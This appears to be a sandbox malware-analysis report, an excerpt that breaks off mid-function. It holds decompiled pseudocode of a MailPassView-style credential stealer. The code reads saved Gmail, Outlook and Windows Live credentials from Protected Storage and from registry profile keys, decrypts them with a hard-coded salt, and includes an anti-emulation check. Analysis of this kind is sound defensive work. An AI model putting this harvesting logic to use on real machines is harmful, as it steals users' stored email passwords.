                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				void* _v304;
                                                                                                                                                    				signed int _v308;
                                                                                                                                                    				struct HWND__* _v312;
                                                                                                                                                    				intOrPtr _v604;
                                                                                                                                                    				struct HACCEL__* _v620;
                                                                                                                                                    				struct HWND__* _v644;
                                                                                                                                                    				char _v900;
                                                                                                                                                    				char _v904;
                                                                                                                                                    				char _v908;
                                                                                                                                                    				struct tagMSG _v936;
                                                                                                                                                    				intOrPtr _v940;
                                                                                                                                                    				struct HWND__* _v944;
                                                                                                                                                    				struct HWND__* _v948;
                                                                                                                                                    				char _v956;
                                                                                                                                                    				char _v980;
                                                                                                                                                    				char _v988;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t49;
                                                                                                                                                    				void* _t52;
                                                                                                                                                    				int _t56;
                                                                                                                                                    				int _t58;
                                                                                                                                                    				int _t68;
                                                                                                                                                    				void* _t72;
                                                                                                                                                    				int _t75;
                                                                                                                                                    				int _t77;
                                                                                                                                                    				struct HWND__* _t78;
                                                                                                                                                    				int _t80;
                                                                                                                                                    				int _t85;
                                                                                                                                                    				int _t86;
                                                                                                                                                    				struct HWND__* _t100;
                                                                                                                                                    
                                                                                                                                                    				 *0x416b94 = _a4;
                                                                                                                                                    				_t49 = E00404837(__ecx);
                                                                                                                                                    				if(_t49 != 0) {
                                                                                                                                                    					E0040EDAC();
                                                                                                                                                    					_t52 = E00406A2C( &_v980);
                                                                                                                                                    					_t100 = 0;
                                                                                                                                                    					_v940 = 0x20;
                                                                                                                                                    					_v948 = 0;
                                                                                                                                                    					_v936.hwnd = 0;
                                                                                                                                                    					_v944 = 0;
                                                                                                                                                    					_v936.message = 0;
                                                                                                                                                    					E0040B785(_t52,  &_v900);
                                                                                                                                                    					_v8 =  &_v980;
                                                                                                                                                    					E00406C87(__eflags,  &_v980, _a12);
                                                                                                                                                    					_t56 = E00406DFB(_v16, "/savelangfile");
                                                                                                                                                    					__eflags = _t56;
                                                                                                                                                    					if(_t56 < 0) {
                                                                                                                                                    						E0040823D(); // executed
                                                                                                                                                    						_t58 = E00406DFB(_v8, "/deleteregkey");
                                                                                                                                                    						__eflags = _t58;
                                                                                                                                                    						if(_t58 < 0) {
                                                                                                                                                     							 *0x417110 = 0x11223344; // executed
                                                                                                                                                     							// E0040ED91 runs as the EnumResourceTypesA enumeration callback; the marker written above
                                                                                                                                                     							// is re-read afterwards, so the rest of the routine runs only if something rewrote it to
                                                                                                                                                     							// 0x1c233487 in between, presumably the callback itself. An environment that stubs the API
                                                                                                                                                     							// without invoking the callback would fail this check.
                                                                                                                                                     							EnumResourceTypesA( *0x416b94, E0040ED91, 0); // executed
                                                                                                                                                     							__eflags =  *0x417110 - 0x1c233487;
                                                                                                                                                     							if( *0x417110 == 0x1c233487) {
                                                                                                                                                    								__eflags =  *((intOrPtr*)(_v12 + 0x30)) - 1;
                                                                                                                                                    								if(__eflags <= 0) {
                                                                                                                                                    									L13:
                                                                                                                                                    									__imp__CoInitialize(_t100);
                                                                                                                                                    									E0040B70A( &_v908);
                                                                                                                                                    									__eflags = _v604 - 3;
                                                                                                                                                    									if(_v604 != 3) {
                                                                                                                                                    										_push(5);
                                                                                                                                                    									} else {
                                                                                                                                                    										_push(3);
                                                                                                                                                    									}
                                                                                                                                                    									ShowWindow(_v644, ??);
                                                                                                                                                    									UpdateWindow(_v644);
                                                                                                                                                    									_v620 = LoadAcceleratorsA( *0x416b94, 0x67);
                                                                                                                                                    									E0040AD9D( &_v908);
                                                                                                                                                    									_t68 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                                                                                    									__eflags = _t68;
                                                                                                                                                    									if(_t68 == 0) {
                                                                                                                                                    										L24:
                                                                                                                                                    										__imp__CoUninitialize();
                                                                                                                                                    										goto L25;
                                                                                                                                                    									} else {
                                                                                                                                                    										do {
                                                                                                                                                    											_t75 = TranslateAcceleratorA(_v644, _v620,  &_v936);
                                                                                                                                                    											__eflags = _t75;
                                                                                                                                                    											if(_t75 != 0) {
                                                                                                                                                    												goto L23;
                                                                                                                                                    											}
                                                                                                                                                    											_t78 =  *0x4171ac;
                                                                                                                                                    											__eflags = _t78 - _t100;
                                                                                                                                                    											if(_t78 == _t100) {
                                                                                                                                                    												L21:
                                                                                                                                                    												_t80 = IsDialogMessageA(_v644,  &_v936);
                                                                                                                                                    												__eflags = _t80;
                                                                                                                                                    												if(_t80 == 0) {
                                                                                                                                                    													TranslateMessage( &_v936);
                                                                                                                                                    													DispatchMessageA( &_v936);
                                                                                                                                                    												}
                                                                                                                                                    												goto L23;
                                                                                                                                                    											}
                                                                                                                                                    											_t85 = IsDialogMessageA(_t78,  &_v936);
                                                                                                                                                    											__eflags = _t85;
                                                                                                                                                    											if(_t85 != 0) {
                                                                                                                                                    												goto L23;
                                                                                                                                                    											}
                                                                                                                                                    											goto L21;
                                                                                                                                                    											L23:
                                                                                                                                                    											_t77 = GetMessageA( &_v936, _t100, _t100, _t100);
                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                    										} while (_t77 != 0);
                                                                                                                                                    										goto L24;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    								_t86 = E0040B8D7( &_v904, __eflags);
                                                                                                                                                    								__eflags = _t86;
                                                                                                                                                    								if(_t86 == 0) {
                                                                                                                                                    									_t100 = 0;
                                                                                                                                                    									__eflags = 0;
                                                                                                                                                    									goto L13;
                                                                                                                                                    								}
                                                                                                                                                    								_push(_v28);
                                                                                                                                                    								_v904 = 0x41356c;
                                                                                                                                                    								L004115D6();
                                                                                                                                                    								__eflags = _v304;
                                                                                                                                                    								if(_v304 != 0) {
                                                                                                                                                    									DeleteObject(_v304);
                                                                                                                                                    									_v308 = _v308 & 0x00000000;
                                                                                                                                                    								}
                                                                                                                                                    								goto L27;
                                                                                                                                                    							}
                                                                                                                                                    							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                                                                                                                    							goto L25;
                                                                                                                                                    						}
                                                                                                                                                    						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
                                                                                                                                                    						goto L25;
                                                                                                                                                    					} else {
                                                                                                                                                    						 *0x417488 = 0x416b28;
                                                                                                                                                    						E0040836E();
                                                                                                                                                    						L25:
                                                                                                                                                    						_push(_v32);
                                                                                                                                                    						_v908 = 0x41356c;
                                                                                                                                                    						L004115D6();
                                                                                                                                                    						__eflags = _v308 - _t100;
                                                                                                                                                    						if(_v308 != _t100) {
                                                                                                                                                    							DeleteObject(_v308);
                                                                                                                                                    							_v312 = _t100;
                                                                                                                                                    						}
                                                                                                                                                    						L27:
                                                                                                                                                    						_v908 = 0x412474;
                                                                                                                                                    						E00406A4E( &_v988);
                                                                                                                                                    						E0040462E( &_v956);
                                                                                                                                                    						E00406A4E( &_v988);
                                                                                                                                                    						_t72 = 0;
                                                                                                                                                    						__eflags = 0;
                                                                                                                                                    						goto L28;
                                                                                                                                                    					}
                                                                                                                                                    				} else {
                                                                                                                                                    					_t72 = _t49 + 1;
                                                                                                                                                    					L28:
                                                                                                                                                    					return _t72;
                                                                                                                                                    				}
                                                                                                                                                    			}
                                                                                                                                                    0x0040ba2d
                                                                                                                                                    0x0040ba2d
                                                                                                                                                    0x0040ba37
                                                                                                                                                    0x0040bbe9
                                                                                                                                                    0x0040bbe9
                                                                                                                                                    0x0040bbf0
                                                                                                                                                    0x0040bbf8
                                                                                                                                                    0x0040bbfd
                                                                                                                                                    0x0040bc05
                                                                                                                                                    0x0040bc0e
                                                                                                                                                    0x0040bc14
                                                                                                                                                    0x0040bc14
                                                                                                                                                    0x0040bc1b
                                                                                                                                                    0x0040bc1f
                                                                                                                                                    0x0040bc27
                                                                                                                                                    0x0040bc30
                                                                                                                                                    0x0040bc39
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040bc3e
                                                                                                                                                    0x0040b9cd
                                                                                                                                                    0x0040b9cd
                                                                                                                                                    0x0040bc40
                                                                                                                                                    0x0040bc46
                                                                                                                                                    0x0040bc46

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404837: LoadLibraryA.KERNEL32(comctl32.dll,75144DE0,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 00404856
                                                                                                                                                      • Part of subcall function 00404837: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404868
                                                                                                                                                      • Part of subcall function 00404837: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040B9C9,75144DE0), ref: 0040487C
                                                                                                                                                      • Part of subcall function 00404837: MessageBoxA.USER32 ref: 004048A7
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040BBF8
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040BC0E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MailPassView
                                                                                                                                                    • API String ID: 745651260-414181363
                                                                                                                                                    • Opcode ID: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                                                                    • Instruction ID: 29be9d14b742f54cd69d53bb86675b71f99c80547e1740e7b57482248bd42427
                                                                                                                                                    • Opcode Fuzzy Hash: 16f53dabeb4a883268802abd1063420dcaf51a14d4cbe642e390ff1ea210f197
                                                                                                                                                    • Instruction Fuzzy Hash: 9D518D71108345ABC7209F61DD09A9BBBF8FF84705F00483FF685A22A1DB789914CB5E
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                    			E00403C3D(signed int __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				struct HINSTANCE__* _t38;
                                                                                                                                                    				void* _t52;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				void* _t56;
                                                                                                                                                    				void* _t58;
                                                                                                                                                    				void* _t60;
                                                                                                                                                    				char* _t73;
                                                                                                                                                    				void* _t76;
                                                                                                                                                    				_Unknown_base(*)()* _t86;
                                                                                                                                                    				void* _t87;
                                                                                                                                                    				void* _t89;
                                                                                                                                                    				signed int _t98;
                                                                                                                                                    				char* _t106;
                                                                                                                                                    				_Unknown_base(*)()* _t120;
                                                                                                                                                    				void* _t131;
                                                                                                                                                    
                                                                                                                                                    				_t131 = __fp0;
                                                                                                                                                    				_t91 = __ecx;
                                                                                                                                                    				_push(__ecx);
                                                                                                                                                    				_t98 = __ecx;
                                                                                                                                                    				_t89 = __ecx + 0x87c;
                                                                                                                                                    				 *(_t89 + 0xc) =  *(_t89 + 0xc) & 0x00000000;
                                                                                                                                                    				E0040E894(_t89);
                                                                                                                                                     				// Protected Storage API (PStore): the store older Windows releases and Outlook Express used for saved credentials
                                                                                                                                                     				_t38 = LoadLibraryA("pstorec.dll"); // executed
                                                                                                                                                    				 *(_t89 + 8) = _t38;
                                                                                                                                                    				if(_t38 == 0) {
                                                                                                                                                    					L4:
                                                                                                                                                    					E0040E894(_t89);
                                                                                                                                                    				} else {
                                                                                                                                                     					_t86 = GetProcAddress(_t38, "PStoreCreateInstance");
                                                                                                                                                     					_t120 = _t86;
                                                                                                                                                     					_t91 = 0 | _t120 != 0x00000000;
                                                                                                                                                     					 *(_t89 + 0x10) = _t86;
                                                                                                                                                     					// Decompiler output (quality 65%): this null test reads inverted relative to the usual
                                                                                                                                                     					// pattern (bail to L4 when the export cannot be resolved, otherwise call it);
                                                                                                                                                     					// treat the branch direction as approximate and confirm it against the disassembly.
                                                                                                                                                     					if(_t120 != 0) {
                                                                                                                                                    						goto L4;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t91 = _t89 + 4;
                                                                                                                                                    						_t87 =  *_t86(_t89 + 4, 0, 0, 0);
                                                                                                                                                    						_t122 = _t87;
                                                                                                                                                    						if(_t87 != 0) {
                                                                                                                                                    							goto L4;
                                                                                                                                                    						} else {
                                                                                                                                                    							 *(_t89 + 0xc) = 1;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				E004047A0(_t98 + 0x890, _t122);
                                                                                                                                                     				// Protected Storage item names under which Gmail/Google account logins were saved; wide (UTF-16LE) strings
                                                                                                                                                     				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Gmail account");
                                                                                                                                                     				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Gmail account");
                                                                                                                                                     				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com/Please log in to your Google Account");
                                                                                                                                                     				E004036CC(_t91, _t98, _t98 + 0x890, _t131, L"www.google.com:443/Please log in to your Google Account");
                                                                                                                                                    				_push(_t98 + 0x858); // executed
                                                                                                                                                    				E0040754D(_t91, _t122); // executed
                                                                                                                                                    				E0040719C(_t91, _t98 + 0x86c); // executed
                                                                                                                                                    				E0040765B(_t122, _t98 + 0x878); // executed
                                                                                                                                                     				// Outlook Express / Windows Mail account store under HKEY_CURRENT_USER (0x80000001)
                                                                                                                                                     				_t52 = E0040EB3F(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts",  &_v8);
                                                                                                                                                    				_t123 = _t52;
                                                                                                                                                    				if(_t52 == 0) {
                                                                                                                                                    					E00402BB8(_t91,  &_v8, _t123, _t131, _t98, 1);
                                                                                                                                                    				}
                                                                                                                                                     				// Outlook "OMI Account Manager" account store (Internet-mail-only Outlook accounts)
                                                                                                                                                     				_t54 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",  &_v8);
                                                                                                                                                    				_t124 = _t54;
                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                    					E00402BB8(_t91,  &_v8, _t124, _t131, _t98, 5);
                                                                                                                                                    				}
                                                                                                                                                    				E00402C44(_t91, _t131, _t98); // executed
                                                                                                                                                    				 *((intOrPtr*)(_t98 + 0xb1c)) = 6;
                                                                                                                                                    				_t56 = E00406278();
                                                                                                                                                    				_push( &_v8);
                                                                                                                                                     				// MAPI profile store; the key path depends on the Windows version reported by E00406278()
                                                                                                                                                     				if( *((intOrPtr*)(_t56 + 0x10)) != 1) {
                                                                                                                                                     					_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
                                                                                                                                                     				} else {
                                                                                                                                                     					_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                                                                                                     				}
                                                                                                                                                    				_push(0x80000001);
                                                                                                                                                    				_t58 = E0040EB3F();
                                                                                                                                                    				_t126 = _t58;
                                                                                                                                                    				if(_t58 != 0) {
                                                                                                                                                    					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					E00402B09( &_v8, _t126, _t131, _t98);
                                                                                                                                                    				}
                                                                                                                                                    				 *((intOrPtr*)(_t98 + 0xb1c)) = 0xf;
                                                                                                                                                     				// Outlook 2013 (Office 15.0) profile store
                                                                                                                                                     				_t60 = E0040EB3F(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                                                                                                    				_t127 = _t60;
                                                                                                                                                    				if(_t60 != 0) {
                                                                                                                                                    					 *((char*)(_t98 + 0xa9c)) = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					E00402B09( &_v8, _t127, _t131, _t98);
                                                                                                                                                    				}
                                                                                                                                                    				E0040E8AB(_t89);
                                                                                                                                                    				E004047F1(_t98 + 0x890);
                                                                                                                                                     				// same routine run against HKEY_CURRENT_USER (0x80000001) and HKEY_LOCAL_MACHINE (0x80000002)
                                                                                                                                                     				E00402FC2(_t98, _t91, _t131, 0x80000001); // executed
                                                                                                                                                     				E00402FC2(_t98, _t91, _t131, 0x80000002); // executed
                                                                                                                                                    				E0040329E(_t131, _t98);
                                                                                                                                                    				E004034CB(_t91, _t127, _t131, _t98); // executed
                                                                                                                                                    				E0040396C(_t127, _t131, _t98); // executed
                                                                                                                                                    				E004037B1(_t91, _t98, _t131, _t98); // executed
                                                                                                                                                    				_t73 = _t98 + 0xb20;
                                                                                                                                                    				_t128 =  *_t73;
                                                                                                                                                    				if( *_t73 != 0) {
                                                                                                                                                    					 *((intOrPtr*)(_t98 + 0xf34)) = 0xa;
                                                                                                                                                    					E0040D37A(_t98 + 0x1c8, _t128, _t73, 0);
                                                                                                                                                    				}
                                                                                                                                                    				_t106 = _t98 + 0xc25;
                                                                                                                                                    				_t129 =  *_t106;
                                                                                                                                                    				if( *_t106 != 0) {
                                                                                                                                                    					strcpy(_t98 + 0x52a, _t98 + 0xe2f);
                                                                                                                                                    					 *((intOrPtr*)(_t98 + 0xf34)) = 0xb;
                                                                                                                                                    					E0040D37A(_t98 + 0x1c8, _t129, _t106, 0);
                                                                                                                                                    				}
                                                                                                                                                    				_push(_t98 + 0x640); // executed
                                                                                                                                                    				E0040D9F9(_t129); // executed
                                                                                                                                                    				E0040D865(_t98 + 0x640);
                                                                                                                                                    				_t76 = E00410D1B(_t98 + 0x870, _t98 + 0x870); // executed
                                                                                                                                                    				return _t76;
			}


                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040E894: FreeLibrary.KERNELBASE(?,0040E8C8,?,?,?,?,?,?,0040421D), ref: 0040E8A0
                                                                                                                                                    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C5C
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C71
                                                                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403E45
                                                                                                                                                    Strings
                                                                                                                                                    • PStoreCreateInstance, xrefs: 00403C6B
                                                                                                                                                    • www.google.com:443/Please log in to your Gmail account, xrefs: 00403CB7
                                                                                                                                                    • pstorec.dll, xrefs: 00403C57
                                                                                                                                                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403D22
                                                                                                                                                    • www.google.com:443/Please log in to your Google Account, xrefs: 00403CCB
                                                                                                                                                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D69
                                                                                                                                                    • www.google.com/Please log in to your Google Account, xrefs: 00403CC1
                                                                                                                                                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CFD
                                                                                                                                                    • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D62
                                                                                                                                                    • www.google.com/Please log in to your Gmail account, xrefs: 00403CAD
                                                                                                                                                    • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$AddressFreeLoadProcstrcpy
                                                                                                                                                    • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                    • API String ID: 2884822230-961845771
                                                                                                                                                    • Opcode ID: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                                                                    • Instruction ID: d05da07ce2d894a49ef5f331cfc6c83e82fbb8602fa7f27bb7646818df223e42
                                                                                                                                                    • Opcode Fuzzy Hash: 736501e530afa2727e5d55e5ce378ede5b836f248ef61c614794b5a243445e0a
                                                                                                                                                    • Instruction Fuzzy Hash: 9B51D771600605B6D714BF72CD46BEABB6CAF00709F10053FF905B61C2DBBCAA5587A9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 224 40d9f9-40da2e call 4118a0 RegOpenKeyExA 227 40db30-40db36 224->227 228 40da34-40da48 RegOpenKeyExA 224->228 229 40db26-40db2a RegCloseKey 228->229 230 40da4e-40da77 RegQueryValueExA 228->230 229->227 231 40db1c-40db20 RegCloseKey 230->231 232 40da7d-40da8c call 4047a0 230->232 231->229 232->231 235 40da92-40daca call 404811 232->235 235->231 238 40dacc-40dad4 235->238 239 40db12-40db16 LocalFree 238->239 240 40dad6-40db0d memcpy * 2 call 40d6fb 238->240 239->231 240->239
                                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                                    			E0040D9F9(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
                                                                                                                                                    				void* _v0;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				long _t34;
                                                                                                                                                    				long _t36;
                                                                                                                                                    				long _t40;
                                                                                                                                                    				void* _t64;
                                                                                                                                                    				void* _t68;
                                                                                                                                                    				int _t73;
                                                                                                                                                    
                                                                                                                                                    				E004118A0(0x102c, _t64);
                                                                                                                                                    				_t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                    					L10:
                                                                                                                                                    					return _t34;
                                                                                                                                                    				}
                                                                                                                                                    				_t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                    					L9:
                                                                                                                                                    					_t34 = RegCloseKey(_v0); // executed
                                                                                                                                                    					goto L10;
                                                                                                                                                    				}
                                                                                                                                                    				_a8 = 0x1000;
                                                                                                                                                    				_t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
                                                                                                                                                    				_t81 = _t40;
                                                                                                                                                    				if(_t40 == 0) {
                                                                                                                                                    					_t63 = _a4 + 0xc;
                                                                                                                                                    					if(E004047A0(_a4 + 0xc, _t81) != 0) {
                                                                                                                                                    						_a20 = _a8;
                                                                                                                                                    						_a24 =  &_a40;
                                                                                                                                                    						_t73 = 0x40;
                                                                                                                                                    						_t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                                                                                                                                                    						_a28 = _t73;
                                                                                                                                                    						_a32 = _t68;
                                                                                                                                                    						if(E00404811(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                                                                                                                                                    							if(_a12 < 0x400) {
                                                                                                                                                    								memcpy( &_a40, _t68, _t73);
                                                                                                                                                    								memcpy( &_a104, _a16, _a12);
                                                                                                                                                    								E0040D6FB(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                                                                                                                                                    							}
                                                                                                                                                    							LocalFree(_a16);
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				RegCloseKey(_a4);
                                                                                                                                                    				goto L9;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA2A
                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E70,?), ref: 0040DA44
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E70,?), ref: 0040DA6F
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E70,?), ref: 0040DB20
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • memcpy.MSVCRT ref: 0040DADD
                                                                                                                                                    • memcpy.MSVCRT ref: 0040DAF2
                                                                                                                                                      • Part of subcall function 0040D6FB: RegOpenKeyExA.ADVAPI32(0040DB12,Creds,00000000,00020019,0040DB12,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040DB12,?,?,?,?), ref: 0040D725
                                                                                                                                                      • Part of subcall function 0040D6FB: memset.MSVCRT ref: 0040D743
                                                                                                                                                      • Part of subcall function 0040D6FB: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040D847
                                                                                                                                                      • Part of subcall function 0040D6FB: RegCloseKey.ADVAPI32(?), ref: 0040D858
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E70,?), ref: 0040DB16
                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E70,?), ref: 0040DB2A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                    • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                    • API String ID: 2768085393-1693574875
                                                                                                                                                    • Opcode ID: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                                                                    • Instruction ID: 6117dd664a6da5d1700893ef21bfd696e4846e6baba0a559227c27352822965f
                                                                                                                                                    • Opcode Fuzzy Hash: 2702e5b6582a814fc20eadb9384ec418d8613a8c7f334e4e23fc0615c867cd5e
                                                                                                                                                    • Instruction Fuzzy Hash: 95316D72504344AFD700DF55DC40D9BBBECEB88358F40493EFA84E2160E774DA188B6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                    				struct HINSTANCE__* _t33;
                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                    				intOrPtr* _t36;
                                                                                                                                                    				void* _t39;
                                                                                                                                                    				void _t41;
                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                    				signed int _t50;
                                                                                                                                                    				int _t52;
                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                    				signed int _t56;
                                                                                                                                                    				signed int _t57;
                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                    				int _t70;
                                                                                                                                                    				void* _t71;
                                                                                                                                                    				intOrPtr _t79;
                                                                                                                                                    
                                                                                                                                                    				_push(0x70);
                                                                                                                                                    				_push(0x4123e0);
                                                                                                                                                    				E00411840(__ebx, __edi, __esi);
                                                                                                                                                    				_t33 = GetModuleHandleA(0);
                                                                                                                                                    				if(_t33->i != 0x5a4d) {
                                                                                                                                                    					L4:
                                                                                                                                                    					 *(_t71 - 0x1c) = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t65 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                                                                                                                                    					if( *_t65 != 0x4550) {
                                                                                                                                                    						goto L4;
                                                                                                                                                    					} else {
                                                                                                                                                    						_t56 =  *(_t65 + 0x18) & 0x0000ffff;
                                                                                                                                                    						if(_t56 == 0x10b) {
                                                                                                                                                    							__eflags =  *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                                                                                                                                                    							if( *((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                                                                                                                                                    								goto L4;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t57 = 0;
                                                                                                                                                    								__eflags =  *(_t65 + 0xe8);
                                                                                                                                                    								goto L9;
                                                                                                                                                    							}
                                                                                                                                                    						} else {
                                                                                                                                                    							if(_t56 == 0x20b) {
                                                                                                                                                    								__eflags =  *((intOrPtr*)(_t65 + 0x84)) - 0xe;
